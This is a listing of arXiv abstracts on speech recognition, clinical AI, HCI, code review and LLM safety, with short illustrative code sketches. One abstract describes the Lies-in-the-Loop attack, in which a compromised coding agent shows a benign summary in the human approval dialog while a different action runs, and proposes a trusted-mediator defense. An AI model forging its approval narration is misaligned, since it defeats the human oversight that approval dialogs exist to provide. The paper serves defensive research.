http://arxiv.org/abs/2606.02375v1 WAXAL-NET: Finetuned Edge ASR Across 19 African Languages 2026-06-01T15:22:35Z

We evaluate whether compact domain-specialized ASR models can outperform massively multilingual foundation models for conversational African speech across 19 languages in the WAXAL corpus. Fine-tuned edge models achieve a macro-averaged WER of $38.0\%$ compared to $64.9\%$ for the best zero-shot baseline, a $26.9$ percentage-point reduction using models $3$--$40\times$ smaller. Results confirm that domain specialization dominates scale for spontaneous African speech. Cross-domain evaluation shows that fine-tuned models recover usable performance on out-of-distribution (OOD) speech, while zero-shot models regain an advantage when the test domain matches their pretraining distribution. A distributed native-speaker audit across all surveyed languages produces a linguistically grounded error taxonomy, showing that CTC and autoregressive architectures behave differently across language families. We further show that WER alone misrepresents performance for syllabary-script languages, where CER/WER ratios reveal substantially higher character-level accuracy than headline WER suggests. Finally, to contribute to future African ASR research, we release all model weights, fine-tuning and evaluation scripts, and a cleaned WAXAL subset covering all $19$ languages.
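The metrics named in this abstract can be illustrated with a minimal sketch. It assumes whitespace tokenization for WER, raw characters (spaces included) for CER, non-empty references, and no text normalization; the function names are hypothetical and this is not the authors' released evaluation script.

```python
def edit_distance(ref, hyp):
    """Levenshtein distance between two sequences (substitutions, insertions, deletions)."""
    prev = list(range(len(hyp) + 1))
    for i, r in enumerate(ref, start=1):
        curr = [i]
        for j, h in enumerate(hyp, start=1):
            cost = 0 if r == h else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution or match
        prev = curr
    return prev[-1]


def wer(ref, hyp):
    """Word error rate: word-level edit distance over reference length in words."""
    ref_words = ref.split()
    return edit_distance(ref_words, hyp.split()) / len(ref_words)


def cer(ref, hyp):
    """Character error rate: character-level edit distance over reference length."""
    return edit_distance(list(ref), list(hyp)) / len(ref)


def macro_average(per_language):
    """Unweighted mean over languages, so each language counts equally."""
    return sum(per_language.values()) / len(per_language)


# Toy example (not WAXAL data): one wrong character makes a whole word wrong.
reference = "the cat sat"
hypothesis = "the cot sat"
print(wer(reference, hypothesis), cer(reference, hypothesis))
```

In the toy pair, a single character substitution costs one of three words but only one of eleven characters. This is the kind of gap a CER/WER ratio exposes when words are long relative to the errors inside them.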

2026-06-01T15:22:35Z Victor Tolulope Olufemi Oreoluwa Babatunde Ramsey Njema Bolarinwa Gbotemi Wanchi Lucia Yen John Uzodinma Sunday Ajayi Oluwademilade Williams Kausar Moshood Innocent Elendu Anyaele Akebert Arefaine Candace Hunzwi Wongel Dawit Daniel Emmilly Namuganga Cleophas Kadima Athanase Bahizire Onitsiky Ranaivoson Emmanuel Aaron Nicholaus Ladislaus Idris Muhammed Jonathan Enoch Simenya Martin Koome Matewos Tegete Endaylalu Peter Ifeoluwa Adeyemo Hondi Prisca Birindwa Ukachi Agnes Eze-Mbey Yacoba Oduro-Yeboah Pericles Adjovi Mikel K. Ngueajio Toluwani Aremu Prasenjit Mitra http://arxiv.org/abs/2606.02305v1 Mapping Whisper Representations to Human ECoG Responses with Interpretable Time-Resolved Neural Encoding 2026-06-01T14:25:36Z

Understanding how speech foundation models relate to human cortical activity is a key challenge for computational neuroscience. Here, we investigate how internal representations from Whisper predict intracranial ECoG responses during naturalistic speech perception. We introduce a time-resolved neural encoder that combines speech embeddings with a recurrent temporal model and soft attention, allowing us to examine layer-wise brain alignment. Intermediate Whisper layers provide the strongest correspondence with neural activity, supporting a hierarchical match between model representations and cortical speech processing. Comparisons with baselines show that high-resolution ECoG responses benefit from temporally structured modelling beyond linear mappings from the same speech representations. In addition, attention maps reveal temporally local alignment between speech embeddings and neural responses, while a phonemic interpretability analysis identifies anatomically coherent phoneme-category organization among encoding-informative electrodes. Together, these results suggest that speech foundation models offer a useful framework for studying time-resolved cortical speech representations.

2026-06-01T14:25:36Z Presented at ICLR 2026 Workshop on Representational Alignment (Re-Align) Matteo Ciferri Tommaso Boccato Michal Olak Matteo Ferrante Nicola Toschi http://arxiv.org/abs/2606.02301v1 Quantitative Movement Testing: Measuring Patient Movements from a Single Smartphone Video 2026-06-01T14:23:17Z

Chronic pain diminishes quality of life by decreasing functional ability, yet objectively measuring this functional impact remains challenging in real-world settings. While optical motion capture provides high precision for assessing altered movement quality, it is costly and restricted to laboratory environments. We aimed to develop and validate Quantitative Movement Testing (QMT), a computer vision pipeline extracting 3D kinematic biomarkers from standard monocular smartphone video, balancing clinical accessibility with biomechanical accuracy. We validated the QMT pipeline, utilising deep learning-based 3D pose-estimation, against gold-standard optical motion capture in healthy controls (N=13). Following leave-one-subject-out calibration to correct systematic bias, we deployed QMT in two prospective clinical cohorts to assess real-world utility: a pre- and post-intervention trial for fibromyalgia patients, and a 30-day longitudinal at-home monitoring study of chronic sciatica patients and healthy controls. In laboratory validation, QMT extracted clinical kinematic metrics with high agreement to optical motion capture, yielding strong correlations (r > 0.85) and low mean absolute errors. QMT demonstrated high test-retest reliability (r > 0.86) in fibromyalgia patients and successfully tracked day-to-day movement fluctuations in chronic sciatica. While real-world home settings introduced higher measurement variance than lab settings, QMT found group-level differences between healthy controls and sciatica patients based entirely on remote recordings. Monocular 3D pose estimation offers a scalable alternative to traditional assessments. QMT provides an objective, accessible biomarker for tracking disease progression and treatment response in clinical trials, though further research is needed to optimise reliability in home environments.

2026-06-01T14:23:17Z Pranav Mahajan Amanda Wall Eleonora Maria Camerone Julie Stebbins Eoin Kelleher Shuangyi Tong Annina Schmid Katja Wiech Anushka Irani Ben Seymour http://arxiv.org/abs/2606.02260v1 Guided Sensemaking: Agents in Collaborative Deliberation 2026-06-01T13:48:24Z

Generative AI systems are aggressively reshaping how students engage with information and perform cognitive work; convenience-oriented use has the potential to displace effortful reasoning, reflection, and learning, especially for those who lack domain expertise and effective human-AI interaction strategies. Current AI tools are heavily focused on chat-style interfaces geared towards answer generation and efficiency in a linear and fragmented stream of text, offering limited support for structured reflection, argument construction, and sensemaking in collaborative contexts. We introduce Guided Sensemaking, an AI-augmented multiagent discourse platform that facilitates composition of well-thought-out ideas around a central question, provides scaffolding for critical thinking, and visualizes argumentative structure to support collaborative deliberation. The system uses several interactive agents to provide context-sensitive questioning prompts and a scaffolding for thought that exposes thematic clusters, agreements, and points of contention without collapsing diverse perspectives. This paper proposes a conceptual design and interaction paradigm that positions generative AI not as a shortcut to answers but as a research partner that externalizes reasoning, preserves user agency, and fosters structured, traceable sensemaking in educational and civic contexts.

2026-06-01T13:48:24Z Presented at Tools for Thought (TfT) workshop at CHI 2026 Aaditya Bhatia Navdeep Kaur Bhatia Marc-Antoine Parent Jack Park http://arxiv.org/abs/2603.22235v3 ShapDBM: Exploring Decision Boundary Maps in Shapley Space 2026-06-01T13:15:08Z

Decision Boundary Maps (DBMs) are an effective tool for visualising machine learning classification boundaries. Yet, DBM quality strongly depends on the dimensionality reduction (DR) technique and the high-dimensional space used for the data points. For complex ML data, DR can create many mixed classes which yield DBMs that are hard to use or even misleading. We propose a new technique to compute DBMs by transforming data space into Shapley space and computing DR on it. Compared to DBMs computed directly from data, our maps have similar or higher quality metric values and visibly more compact, easier to explore, decision zones that better agree with measured model performance.

2026-03-23T17:31:20Z 4 pages and 3 figures (excluding supplementary material) Luke Watkin Daniel Archambault Alex Telea http://arxiv.org/abs/2606.02208v1 Context-Aware Workflow Decomposition for Automated Mobile UI Annotation Using Multimodal Large Language Models 2026-06-01T13:08:07Z

Accurate mobile user interface annotation is important for UI understanding, accessibility tools, automated testing, dataset construction, and GUI agents. However, mobile screens are difficult to annotate because they often contain small, dense, nested, and visually ambiguous elements. Multimodal large language models can help automate this process, but their outputs are sensitive to prompt design and the organization of annotation tasks. This paper studies automated mobile UI annotation from a workflow design perspective, focusing on improving annotation precision. Rather than asking the model to annotate all UI elements in a single step, the task is divided into smaller context-aware stages, allowing related UI elements to be handled with clearer instructions and useful screen context. The proposed pipeline uses structured prompts, schema-constrained JSON outputs, and element-specific annotation instructions. Experiments are conducted on expert-annotated mobile UI screens from the MUIAnno dataset, using eight common UI element types: button, tab, clickable text, card, label, plain text, icon, and image. Four workflow strategies are evaluated: one-step, two-step, four-step, and eight-step annotation. Results show that the two-step workflow achieves the highest precision, while deeper decomposition improves recall but produces more false positives. Additional grouping experiments show that annotation quality depends on both workflow depth and element-class grouping. Overall, careful workflow design can make LLM-based mobile UI annotation more reliable for UI understanding, dataset construction, and GUI agent development.

2026-06-01T13:08:07Z Athar Parvez Muhammad Jawad Mufti Muqaddas Gull Omar Hammad http://arxiv.org/abs/2606.02082v1 Overview of the ClinicalSkillQA 2026 Shared Task on Continuous Perception and Procedural Reasoning in Clinical Skill Assessment 2026-06-01T11:12:28Z

This paper presents an overview of the ClinicalSkillQA 2026 shared task, which was organized with the BioNLP Workshop at ACL 2026. The goal of this shared task is to evaluate continuous perception and procedural reasoning in clinical skill assessment by requiring systems to reconstruct the correct temporal order of shuffled clinical key frames and generate rationales grounded in clinical workflow knowledge. The benchmark contains 200 test-only instances sampled from clinical skill videos, covering three emergency-care procedures. Each instance is annotated with the ground-truth temporal order and an expert-verified rationale. A total of seven teams participated in the task, collectively making 90 submissions, with four teams providing system description papers. Systems are evaluated using Task Accuracy, Pairwise Accuracy, and BERTScore, which measure exact sequence reconstruction, local temporal consistency, and rationale quality, respectively. In this paper, we describe the task setup, dataset construction, and evaluation criteria. We further summarize the methodologies adopted by participating teams and present a comprehensive analysis of the submitted systems. The official results suggest that current models still struggle with continuous perception and procedural reasoning, especially when they must integrate visual evidence, temporal structure, and clinical workflow knowledge.
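The two ordering metrics can be sketched as follows. The abstract does not give their formal definitions, so this sketch makes two assumptions: Task Accuracy is the fraction of instances whose predicted order matches the ground truth exactly, and Pairwise Accuracy is the fraction of frame pairs placed in the correct relative order. The official scorer may instead use adjacent pairs only or some other variant. Function names and frame labels are hypothetical.

```python
from itertools import combinations


def task_accuracy(predictions, golds):
    """Fraction of instances whose predicted frame order equals the gold order exactly."""
    return sum(p == g for p, g in zip(predictions, golds)) / len(golds)


def pairwise_accuracy(prediction, gold):
    """Fraction of frame pairs whose relative order in the prediction matches the gold order.

    Assumes both sequences contain the same distinct frame identifiers.
    """
    position = {frame: i for i, frame in enumerate(prediction)}
    pairs = list(combinations(gold, 2))  # (a, b) with a before b in the gold order
    correct = sum(position[a] < position[b] for a, b in pairs)
    return correct / len(pairs)


# Toy instance: two middle frames are swapped.
gold = ["A", "B", "C", "D"]
prediction = ["A", "C", "B", "D"]
print(task_accuracy([prediction], [gold]), pairwise_accuracy(prediction, gold))
```

Under these assumptions, a single swap yields zero credit on exact-sequence matching while most pairwise relations remain correct, which is why the two scores are informative together.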

2026-06-01T11:12:28Z Xiyang Huang Renxiong Wei Yihuai Xu Zhiyuan Chen Keying Wu Jiayi Xiang Buzhou Tang Yanqing Ye Jinyu Chen Cheng Zeng Min Peng Qianqian Xie Sophia Ananiadou http://arxiv.org/abs/2606.02668v1 What You Approve Is What Executes: Consent Integrity for Black-Box LLM Agents 2026-06-01T11:08:17Z

Coding agents gate consequential actions behind a human-in-the-loop approval dialog, but the dialog is narrated by the agent itself: the human approves a summary the agent writes. The Lies-in-the-Loop (LITL) attack shows that summary is forgeable, so a compromised agent can show a benign description while a different action runs. This paper names the missing property, Consent Integrity, by importing What You See Is What You Sign (WYSIWYS) and the trusted-path property into the agent approval channel: the action shown to the human must be rendered by a trusted mediator from the real action at the boundary, not the agent's narration, over a path the agent cannot spoof, and bound to the exact action that executes. Two twists distinguish it from classical WYSIWYS: the renderer is the adversary, and the boundary ground truth is a low-level event that must be decoded without trusting the agent. Since no decoder is complete, the realizable target is analyzer-relative: whatever the analyzer cannot classify is surfaced as uninspectable rather than silently approved. A prototype implements the analyzer, renderer, and bind-to-execution; total mediation and the trusted path are specified but assumed, not implemented. On GTFOBins, an independent corpus of 1330 trusted-tool abuses, the prototype silently passes 10.0% (every instance through a trusted tool); on tldr, 28,798 normal-usage commands, it marks 87.0% uninspectable. These two independent measurements bracket the design's central tension: the trust list that bounds silent passes is the same one that drives over-prompting, and a boundary-only mediator can move along that frontier but not escape it. The contribution is the property, the mechanism, and an honest position on that frontier, not a solved defense.
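A minimal sketch of two ideas from this abstract: an analyzer that surfaces anything it cannot classify as uninspectable, and an approval bound to the exact action that executes. It is not the prototype from the linked artifact. The trust list, the shell-metacharacter check, and all function names are hypothetical, and binding by SHA-256 digest is one assumed mechanism among several possible.

```python
import hashlib
import shlex

# Hypothetical trust list; the paper's actual list is not given in the abstract.
TRUSTED_TOOLS = {"ls", "cat", "git"}

# Characters that let a command do more than its first word suggests.
SHELL_METACHARACTERS = set("|;&$`><")


def classify(command):
    """Return 'trusted' only when the analyzer can fully decode the command.

    Everything else is surfaced as 'uninspectable' rather than silently approved.
    """
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return "uninspectable"
    try:
        argv = shlex.split(command)
    except ValueError:  # e.g. an unterminated quote
        return "uninspectable"
    if not argv or argv[0] not in TRUSTED_TOOLS:
        return "uninspectable"
    return "trusted"


def action_digest(command):
    """Digest of the exact command text, recorded at approval time."""
    return hashlib.sha256(command.encode("utf-8")).hexdigest()


def may_execute(command, approved_digest):
    """Bind-to-execution: run only the byte-identical action that was approved."""
    return action_digest(command) == approved_digest


approved = action_digest("git status")
print(classify("git status"), may_execute("git status", approved))
print(classify("curl http://example.com | sh"), may_execute("git push --force", approved))
```

The sketch also shows the tension the abstract describes. Anything invoked through a tool on the trust list passes without inspection of its arguments, so widening the list increases silent passes while narrowing it increases prompts.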

2026-06-01T11:08:17Z Preprint. IEEE conference format. Proof-of-concept; artifact at https://github.com/zjnbwxq/agentguard-ci Xiaoqi Weng http://arxiv.org/abs/2606.02037v1 Respectful Things: Adding Social Intelligence to 'Smart' Devices 2026-06-01T10:26:21Z

In this paper, we propose that the idea of devices respecting their end-users may serve as a strong design goal for highly personal and intimate smart devices. We ask what respect is, how it shapes interaction, and how good-faith simulation of respect might inform user-friendly smart device design. Respect is a natural and integral part of human relationships that is seen to shape work and personal relations. In a basic sense, this is the core purpose of smart things: we expect them to be ready and willing to help us. In this vein, we distil the characteristics of more complex respectful behaviours into four main types relevant to smart devices, drawing from philosophical analyses of the conceptual dimensions of respect: directive respect, obstacle respect, recognition respect, and care respect. We discuss the implications of each of these kinds of respect for the future of smart personal devices.

2026-06-01T10:26:21Z In Proceedings of the 2018 Living in the Internet of Things: Cybersecurity of the IoT Conference Max Van Kleek William Seymour Reuben Binns Nigel Shadbolt 10.1049/cp.2018.0006 http://arxiv.org/abs/2606.01976v1 AutoBG: A Board Game Design Assistant with Interactive Ideation, Iterative Rulebook Generation, and Individualized Feedback 2026-06-01T09:37:51Z

Designing a board game demands both thinking as a designer and experiencing as a player, while iterating through repeated prototyping and playtesting cycles, making it a cognitively intensive creative task well suited for human-AI collaboration. However, current systems lack end-to-end support to guide designers through the complete workflow from vague early ideation to iterative rulebook revision and audience testing. To this end, we present AutoBG, a board game design assistant built around critic-driven iterative refinement, comprising four specialized modules: BG-Ideator guides designers via multi-turn dialogue to produce structured design drafts; BG-Realizer generates complete rulebooks from drafts and revises them in a closed loop with BG-Critic, which diagnoses design flaws and gates each revision so that only verified improvements are accepted; and BG-Persona simulates individualized feedback from 150 real player profiles. Together, these modules enable designers to go from an initial idea to a polished, audience-tested rulebook within a single integrated workflow. The system is built on 2.2K structured rulebooks and 180K quality-filtered real player reviews, with task-specific training data derived for each module. Experiments on 207 held-out games show that AutoBG substantially outperforms state-of-the-art baselines (e.g., GPT-5.4), generating rulebooks that approach the quality of published games. Furthermore, a user study with 30 participants across diverse experience levels confirms that AutoBG effectively reduces blank-page anxiety, surfaces hidden design flaws, and provides highly rated, practical assistance throughout the creative process.

2026-06-01T09:37:51Z Zizhen Li Chuanhao Li Yibin Wang Jianwen Sun Yukang Feng Fanrui Zhang Mingzhu Sun Yifei Huang Kaipeng Zhang http://arxiv.org/abs/2606.01969v1 Trust-Calibrated Code Review: A Participatory Design Study of Review Workflows for LLM-Generated Multi-File Changes 2026-06-01T09:32:25Z

Background: Developers increasingly review multi-file code changes generated by LLM-based agents, yet no validated end-to-end workflow or IDE tooling design exists for this scenario. Aims: We investigate (RQ1) the challenges developers face when reviewing LLM-generated multi-file changes and (RQ2) how developers envision effective workflows for this task. Method: In collaboration with JetBrains, we conducted a participatory design study structured using the double-diamond design process with Discover, Define, Develop, and Deliver phases. Industry practitioners participated in the Discover phase (N=17); seven of these returned for the Develop phase. The Define phase was an author-led synthesis. The Deliver phase produced a conceptual design and a high-fidelity semi-interactive prototype evaluated through a follow-up survey with N=43 practitioners. Results: Participants identified trust-calibration as the central challenge. The study yielded a three-level review workflow (overview, file-analysis, code snippet review) supported by seven design constructs (chunk, risk-per-line, risk-per-file, judge, walk-through, zooming in/out, and security cage). In the validation survey, all three workflow levels scored above the neutral midpoint (means 3.50--3.91 on a five-point scale). Of the respondents, 63% expected reduced overall review effort, and 52% expected reduced trust-assessment effort, relative to their current tools. These findings suggest that the design constructs are a promising direction for future tool development. Conclusions: Reviewing LLM-generated multi-file changes is a trust-calibration problem rather than a diffing problem. The three-level workflow and the seven constructs we report give tool designers a conceptual framework for building AI-ready code review tools that surface risk and confidence signals at the granularity at which developers allocate attention.

2026-06-01T09:32:25Z Submitted to ESEM SEIP 2026 Lo Gullstrand Heander Agnia Sergeyuk Ilya Zakharov Emma Söderberg Nikita Mukhortov http://arxiv.org/abs/2604.13860v4 "AI Psychosis" in Context: How Conversation History Shapes LLM Responses to Delusional Beliefs 2026-06-01T06:44:11Z

Extended interaction with large language models (LLMs) has been linked to the reinforcement of delusional beliefs, attracting clinical and public concern. Yet most empirical work evaluates model safety in brief interactions, which may not reflect how harms develop through sustained dialogue. Five LLMs were tested across three levels of accumulated context, using the same escalating delusional conversation history to isolate its effect on model behaviour. Responses were coded on risk and safety dimensions, and each model was analysed qualitatively. Models separated into two distinct tiers: GPT-4o, Grok 4.1 Fast, and Gemini 3 Pro exhibited high-risk, low-safety profiles; Claude Opus 4.5 and GPT-5.2 Instant displayed the opposite pattern. As context accumulated, performance degraded in the unsafe group, while the same material activated stronger safety interventions among safer models. Qualitative analysis identified distinct mechanisms of failure, including validating the user's delusional premises, elaborating beyond them with new content, and attempting harm reduction from within the delusional frame. Safer models, however, often used the established relationship to support intervention, challenging delusional beliefs and directing the user to external support. These findings indicate that accumulated context functions as a stress test of safety architecture, revealing whether prior dialogue is treated as a worldview to inherit or evidence to evaluate. Short-context assessments may therefore mischaracterise model safety, underestimating danger in some systems while missing context-activated gains in others. The results suggest that delusion reinforcement is a tractable alignment failure, with safer models establishing a baseline that future systems should now be expected to meet.

2026-04-15T13:27:23Z Luke Nicholls Robert Hutto Zephrah Soto Hamilton Morrin Thomas Pollak Raj Korpan Cheryl Carmichael http://arxiv.org/abs/2605.14830v2 Agentic AI and Human-in-the-Loop Interventions: Field Experimental Evidence from Alibaba's Customer Service Operations 2026-06-01T06:04:55Z

Agentic AI systems that autonomously perform service tasks are entering customer service operations. However, limited evidence exists on how human interventions shape service outcomes when agentic AI failures create both cognitive and emotional consequences. We study this issue through a randomized field experiment on Alibaba's Taobao platform. Workers in the treatment condition supervised an agentic AI system that resolved AI-eligible chats while continuing to handle AI-ineligible chats, whereas control workers resolved all chats without agentic AI. The findings show that AI deployment reduces average chat duration and has limited effects on retrial rates, but substantially lowers ratings for AI-eligible chats. Moreover, human intervention effectiveness in AI-eligible chats depends on the nature of AI failure, post-escalation intervention effort, and intervention timing. Human intervention preserves service quality in algorithm-triggered technical escalations, i.e., unresolved customer issues beyond the AI's capability, but is less effective in algorithm-triggered emotional escalations, i.e., where customers express frustration or dissatisfaction. These differences are partly explained by variation in workers' post-escalation intervention effort across escalation types. In algorithm-triggered emotional escalations, workers showed lower engagement: they sent fewer messages, contributed a smaller share of total chat rounds, and showed less proactivity in information seeking and solution provision. We further find that early intervention is essential for sustaining high post-escalation intervention effort. Finally, we document a positive spillover effect on AI-ineligible chats, as treated workers adapted their multitasking workflow to devote greater attention to these chats. These findings offer implications for human-in-the-loop process design in human-AI collaboration systems.

2026-05-14T13:35:52Z Yiwei Wang Chuan Zhu Tianjun Feng Lauren Xiaoyuan Lu Bingxin Jia http://arxiv.org/abs/2604.01562v2 Acoustic and perceptual differences between standard and accented speech and their voice clones 2026-06-01T05:58:54Z

Voice cloning is often evaluated in terms of overall quality, but less is known about accent preservation and its perceptual consequences. We compare standard and heavily accented Mandarin speech and their voice clones using a combined computational and perceptual design. Embedding-based analyses showed larger original-clone distances for accented speakers in several speaker-discriminative embedding spaces, but this difference disappeared after normalizing against each speaker's within-original baseline variability. In the perception study, clones are rated as more similar to their originals for standard than for accented speakers, and intelligibility increases from original to clone, with a larger gain for accented speech. These results show that accent variation can shape perceived identity match and intelligibility in voice cloning even when it is not reflected in baseline-normalized speaker-embedding distance, and they motivate treating accent preservation as an explicit component of speaker identity preservation, rather than assuming that it is fully captured by off-the-shelf speaker-discriminative embeddings.
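The baseline normalization described in this abstract can be sketched as follows. The sketch assumes cosine distance and normalization by division, taking the mean original-to-clone distance over the mean pairwise distance among the same speaker's original utterances. The paper's exact procedure is not stated in the abstract and may differ. The function names and toy two-dimensional vectors are hypothetical and stand in for real speaker embeddings.

```python
import math
from itertools import combinations


def cosine_distance(u, v):
    """1 minus cosine similarity of two non-zero vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    return 1.0 - dot / (norm_u * norm_v)


def mean(values):
    values = list(values)
    return sum(values) / len(values)


def normalized_clone_distance(originals, clones):
    """Original-to-clone distance relative to the speaker's own within-original spread.

    Requires at least two original utterances with non-zero spread.
    """
    baseline = mean(cosine_distance(a, b) for a, b in combinations(originals, 2))
    raw = mean(cosine_distance(o, c) for o in originals for c in clones)
    return raw / baseline


# Toy vectors (not real embeddings): two originals and one clone.
originals = [[1.0, 0.0], [0.0, 1.0]]
clones = [[1.0, 0.0]]
print(normalized_clone_distance(originals, clones))
```

Under this assumed normalization, a speaker whose own utterances vary widely gets a large baseline. A large raw original-to-clone distance can then shrink to an unremarkable ratio, consistent with the group difference disappearing after normalization.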

2026-04-02T03:17:41Z Tianle Yang Chengzhe Sun Phil Rose Siwei Lyu http://arxiv.org/abs/2511.06676v3 How AI Fails: An Interactive Pedagogical Tool for Demonstrating Dialectal Bias in Automated Toxicity Models 2026-06-01T05:41:41Z

Now that AI-driven moderation has become pervasive in everyday life, we often hear claims that "the AI is biased". While this is often said jokingly, the light-hearted remark reflects a deeper concern. How can we be certain that an online post flagged as "inappropriate" was not simply the victim of a biased algorithm? This paper investigates this problem using a dual approach. First, I conduct a quantitative benchmark of a widely used toxicity model (unitary/toxic-bert) to measure performance disparity between text in African-American English (AAE) and Standard American English (SAE). The benchmark reveals a clear, systematic bias: on average, the model assigns AAE text toxicity scores 1.8 times higher and "identity hate" scores 8.8 times higher than SAE text. Second, I introduce an interactive pedagogical tool that makes these abstract biases tangible. The tool's core mechanic, a user-controlled "sensitivity threshold," demonstrates that the biased score itself is not the only harm; instead, the more concerning harm is the human-set, seemingly neutral policy that ultimately operationalises discrimination. This work provides both statistical evidence of disparate impact and a public-facing tool designed to foster critical AI literacy.
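The "sensitivity threshold" mechanic can be illustrated with a minimal sketch. The scores below are hypothetical values chosen for illustration. They are not outputs of unitary/toxic-bert and not data from the paper, and the function name is likewise an assumption.

```python
def flag_rate(scores, threshold):
    """Share of posts whose toxicity score meets or exceeds the moderation threshold."""
    return sum(score >= threshold for score in scores) / len(scores)


# Hypothetical toxicity scores for equally benign posts in two dialects.
sae_scores = [0.05, 0.10, 0.20, 0.35, 0.60]
aae_scores = [0.10, 0.25, 0.40, 0.55, 0.80]

# A single, seemingly neutral threshold applied to both groups.
for threshold in (0.3, 0.5, 0.7):
    sae = flag_rate(sae_scores, threshold)
    aae = flag_rate(aae_scores, threshold)
    print(f"threshold={threshold:.1f}  SAE flagged={sae:.0%}  AAE flagged={aae:.0%}")
```

With these toy values the same cut-off flags a larger share of the AAE posts at every setting shown. The gap in outcomes therefore depends on where the human-set threshold sits as well as on the shifted scores.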

2025-11-10T03:49:58Z 9 pages, 5 figures, 4 tables, 14 references. Preliminary abstract presented at the International Conference on Envisioning the Himalayan Future: Pathways to Sustainability and Development (PUiCON 2026) p. 105; abstract available online at: https://pufoe.edu.np/wp-content/uploads/2026/05/PUiCON_2026_Book_of-_Abstracts.pdf Subhojit Ghimire